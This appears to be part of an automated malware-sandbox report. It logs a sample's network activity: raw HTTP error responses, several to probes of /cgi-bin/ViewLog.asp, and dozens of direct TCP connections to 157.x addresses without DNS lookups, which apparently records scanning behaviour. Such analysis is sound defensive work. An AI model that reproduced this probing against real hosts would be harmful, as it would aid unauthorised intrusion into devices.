          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Nov 2023 21:10:45 GMTServer: Apache/2.2.22 (Ubuntu)X-Powered-By: PHP/5.3.10-1ubuntu3.26Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 2622Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html;charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c 5b 53 db 48 16 7e 26 55 f9 0f 1a 3d cc 9b 91 2f 5c 4c 30 7e d8 64 6a 77 aa 66 76 a7 b6 98 da dd a7 2d 81 05 36 31 b2 c7 16 21 79 c3 c3 cd 84 3b 31 77 67 20 cb c5 40 c2 2d 90 80 6d 2e 7f 46 2d c9 4f f9 0b db 52 4b 76 fb 22 4b b1 c6 cc 3c 38 05 b6 91 fb 3b fd e9 f4 f9 4e 9f 96 5a f9 92 bd f7 7c f3 ec 1f 4f bb ff f3 d3 77 84 9f 1b 0c 12 3f fd fc 97 1f be 7f 4a 90 36 8a fa 97 eb 29 45 3d eb 7e 46 fc fb 6f dd 3f fe 40 38 9a ed 44 77 84 66 a3 01 2e 10 62 e9 20 45 7d f7 77 92 20 fd 1c 17 7e 42 51 c3 c3 c3 cd c3 ae e6 50 a4 9f ea fe 27 f5 52 b6 e5 90 c1 ea 47 1b 87 21 9b 7d 9c 8f f4 3e 7e e4 51 7a 7c 39 18 64 a3 5d 15 ec 38 3a 3a 3a 10 1c 35 66 68 9f fc 3e c8 70 34 21 b7 b6 31 bf 0c 05 5e 74 91 4f 43 2c c7 b0 9c ad fb 55 98 21 89 5e f4 57 17 c9 31 2f 39 4a 46 77 12 bd 7e 3a 12 65 b8 ae 21 ae cf e6 26 09 4a 36 c3 05 b8 20 e3 15 3e a4 c4 bb 39 61 75 2f b7 75 08 92 07 62 e6 5e fc 78 07 de c4 f8 eb 11 30 93 e1 33 33 f2 eb f5 14 7c 15 ee 47 84 d1 71 31 7b 03 16 e2 b6 22 d8 e6 2d 9f 49 a1 2f a4 d4 44 ee 7f 8b c8 90 94 fa 55 4c 4e ab 4d f9 cc 86 70 f9 11 35 02 e3 b3 d2 65 1a f5 93 7b bf 26 5c 8f 57 00 20 db 38 4c 8f 12 02 17 c1 aa 9f 83 0a 40 bc 8b 60 58 3f a8 91 b0 74 2c 24 ee 6c 88 86 4a e9 fa 58 58 99 04 c7 ab 20 bd 0c 9b 8a 99 14 9f 3e 17 b7 63 45 00 d5 36 46 46 dc 9f 07 f1 43 e4 1f bd f3 01 9b 9b f0 d5 06 66 e3 60 37 a9 77 0e 45 be c2 fb 41 67 52 00 df aa bd 69 ec f1 21 43 8d 14 4a 74 38 ac 9a 29 6f 57 ee 90 a2 31 d2 a5 88 99 2f 1e ce b2 a6 c8 04 1e 36 15 06 12 7d 5d 0e b6 e1 1d 95 7f 8d 62 4b 75 02 ee a9 f2 40 2f e6 aa 44 89 5e a7 28 7a 3d 14 d2 8f a6 47 96 1e 64 ba 48 1f 13 ed 8d 04 c2 b2 ca 31 21 36 34 d6 d0 58 43 63 5f af 31 92 2a 91 d7 73 e6 d5 70 28 e2 8b 36 b4 d5 d0 56 43 5b bf 83 b6 82 01 f6 39 11 61 82 5d 64 94 7b 15 64 a2 7e 86 e1 48 82 83 75 a4 5a 3e f6 46 a1 d8 fc 11 a6 2f 5f 9f 52 1c 33 48 f9 98 3e 7a 28 a8 7c 2d ff 36 cb cd a8 ca b5 29 dd eb 67 6c 72 85 1a 09 05 31 dd b2 21 54 11 f7 85 22 83 6a 41 fa 35 58 58 49 33 70 e0 55 24 a5 95 c6 3d 21 df 2b f9 dd 17 78 41 f4 06 e9 28 2c ab 7b 68 96 65 22 44 2f 44 32 11 a5 8e fe fe c7 bf 12 8f 1f 11 ca bf 68 a4 b7 70 66 45 a7 16 18 a4 fb 99 28 e5 b0 39 9b 07 c2 fd 24 31 1c f0 71 fe ae 8e 36 bb 8a f5 33 81 7e 3f d7 d5 61 57 08 04 03 f0 ad a9 c9 43 0d 05 95 0f ca 1f 43 41 8d 04 4b bf 20 51 83 60 80 20 bc 1e ba c4 a7 a4 37 b7 bf 42 e4 de 7d f2 50 b4 37 6f ad 49 69 5f de 9a 65 86 a3 b0 4d 94 a3 1c 94 d3 49 7a c1 eb 03 fe 36 29 4e 4d 7e 3d da 01 d1 53 29 39 2f d6 82 b6 43 f4 4a 12 1a a8 05 ed e8 20 bd 62 fc bc c6 be 1d 6e d2 2b c4 16 84 91 95 9a d0 ed b0 ef d4 22 48 67 6b 42 b7 c2 be e3 6b 7c 66 aa 26 74 8b 32 62 62 a2 b6 be 5d 90 79 e6 08 dc 2e 57 40 eb c6 97 3f c4 51 ca cc 09 2d
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 157.189.6.240
          Source: unknownTCP traffic detected without corresponding DNS query: 157.106.55.241
          Source: unknownTCP traffic detected without corresponding DNS query: 157.26.230.215
          Source: unknownTCP traffic detected without corresponding DNS query: 157.21.215.166
          Source: unknownTCP traffic detected without corresponding DNS query: 157.113.48.85
          Source: unknownTCP traffic detected without corresponding DNS query: 157.102.123.118
          Source: unknownTCP traffic detected without corresponding DNS query: 157.220.14.243
          Source: unknownTCP traffic detected without corresponding DNS query: 157.116.66.215
          Source: unknownTCP traffic detected without corresponding DNS query: 157.228.59.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.97.69.97
          Source: unknownTCP traffic detected without corresponding DNS query: 157.221.246.84
          Source: unknownTCP traffic detected without corresponding DNS query: 157.95.105.46
          Source: unknownTCP traffic detected without corresponding DNS query: 157.208.62.135
          Source: unknownTCP traffic detected without corresponding DNS query: 157.206.190.100
          Source: unknownTCP traffic detected without corresponding DNS query: 157.76.228.57
          Source: unknownTCP traffic detected without corresponding DNS query: 157.129.122.97
          Source: unknownTCP traffic detected without corresponding DNS query: 157.64.36.12
          Source: unknownTCP traffic detected without corresponding DNS query: 157.44.38.66
          Source: unknownTCP traffic detected without corresponding DNS query: 157.22.93.26
          Source: unknownTCP traffic detected without corresponding DNS query: 157.137.90.251
          Source: unknownTCP traffic detected without corresponding DNS query: 157.88.1.52
          Source: unknownTCP traffic detected without corresponding DNS query: 157.2.69.108
          Source: unknownTCP traffic detected without corresponding DNS query: 157.6.252.166
          Source: unknownTCP traffic detected without corresponding DNS query: 157.121.172.9
          Source: unknownTCP traffic detected without corresponding DNS query: 157.83.149.196
          Source: unknownTCP traffic detected without corresponding DNS query: 157.33.204.89
          Source: unknownTCP traffic detected without corresponding DNS query: 157.196.149.113
          Source: unknownTCP traffic detected without corresponding DNS query: 157.207.205.108
          Source: unknownTCP traffic detected without corresponding DNS query: 157.237.242.45
          Source: unknownTCP traffic detected without corresponding DNS query: 157.253.243.169
          Source: unknownTCP traffic detected without corresponding DNS query: 157.47.93.225
          Source: unknownTCP traffic detected without corresponding DNS query: 157.215.119.21
          Source: unknownTCP traffic detected without corresponding DNS query: 157.178.38.144
          Source: unknownTCP traffic detected without corresponding DNS query: 157.231.198.233
          Source: unknownTCP traffic detected without corresponding DNS query: 157.27.253.60
          Source: unknownTCP traffic detected without corresponding DNS query: 157.213.38.52
          Source: unknownTCP traffic detected without corresponding DNS query: 157.31.248.56
          Source: unknownTCP traffic detected without corresponding DNS query: 157.93.112.28
          Source: unknownTCP traffic detected without corresponding DNS query: 157.177.235.126
          Source: unknownTCP traffic detected without corresponding DNS query: 157.12.71.161
          Source: unknownTCP traffic detected without corresponding DNS query: 157.74.7.122
          Source: unknownTCP traffic detected without corresponding DNS query: 157.23.247.238
          Source: unknownTCP traffic detected without corresponding DNS query: 157.164.74.25
          Source: unknownTCP traffic detected without corresponding DNS query: 157.49.126.180
          Source: unknownTCP traffic detected without corresponding DNS query: 157.187.50.178
          Source: unknownTCP traffic detected without corresponding DNS query: 157.62.183.209
          Source: unknownTCP traffic detected without corresponding DNS query: 157.47.164.175
          Source: unknownTCP traffic detected without corresponding DNS query: 157.91.102.117
          Source: unknownTCP traffic detected without corresponding DNS query: 157.174.252.132
          Source: unknownTCP traffic detected without corresponding DNS query: 157.46.53.5
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Nov 2023 14:14:30 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Nov 2023 14:14:30 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Mon, 13 Nov 2023 21:18:13 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:18:26 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/8.0.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://twatzl.photography/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 64 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 77 61 74 7a 6c 2e 70 68 6f 74 6f 67 72 61 70 68 79 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 77 61 74 7a 6c 2e 70 68 6f 74 6f 67 72 61 70 68 79 2f 22 2c 22 6e 61 6d 65 22 3a 22 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:18:30 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Mon, 23 Oct 2023 13:43:55 GMTETag: "bf4d9-581-6086269d68042"Accept-Ranges: bytesContent-Length: 1409Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 13 Nov 2023 21:18:40 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-control: no-cacheServer: Ubicom/1.1Content-Length: 9Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:18:47 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 13 Nov 2023 21:18:49 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:16:51 GMTServer: ApacheContent-Length: 207Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:18:54 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.2.17Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Jan 2023 18:22:31 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Nov 2023 21:18:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
